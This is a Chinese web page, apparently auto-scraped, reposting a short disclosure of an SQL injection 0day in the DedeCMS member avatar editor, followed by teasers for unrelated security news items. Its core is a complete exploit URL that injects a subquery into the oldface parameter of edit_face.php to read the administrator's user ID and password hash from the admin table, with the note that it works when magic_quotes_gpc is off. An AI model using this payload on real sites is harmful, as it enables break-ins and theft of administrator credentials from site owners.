DedeCMS会员中心头像修改SQL注射漏洞

网站建设评论10

作者:c4rp3nt3r

主页:http://www.0x50sec.org

DedeCMS会员中心头像修改SQL注射0day漏洞

同样需要 magic_quotes_gpc = Off ,成功利用此漏洞可获得管理员密码

漏洞参数 oldspacelogo SQL注射

http://bt/de/member/edit_face.php?dopost=save&oldface=/de/uploads/userup/3/eee.jpg%27and%20@%60%27%60,face=%28select%20concat%28userid,0x3a,pwd%29%20from%20%60%23@__admin%60%20limit%201%29,joinip=\'1

该文章由WP-AutoPost插件自动采集发布

原文地址:http://bluereader.org/article/23968082

 
网站建设

鑫合汇招聘安全人才

鑫合汇(www.xinhehui.com)是以P2B(个人到企业或机构)为模式的新型互联网投融平台,为各类个人、机构及企业投资者提供安全、便捷、高收益的投资及理财产品,为企业及个人提供直接融资服务,为...
网站建设

GPS安全性的一点科普

GPS的安全性并不是一个新话题。最著名的例子恐怕要算2011年伊朗劫持美国无人机[1]。2011年12月4日,美国的一架RQ-170无人机,在伊朗领空飞行。伊朗军方并没有击落它,而是使用了某种GPS欺...
网站建设

携程5月28日上午国内传言携程被黑

5月28日上午,国内知名的携程旅行网出现故障。据传言是遭到黑客入侵,所有数据被删除,服务器瘫痪。携程说:大家不要在外面乱说,就说正在恢复中,数据一切安全。携程被黑前方多图预警。携程被黑百度被黑,好像是...
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: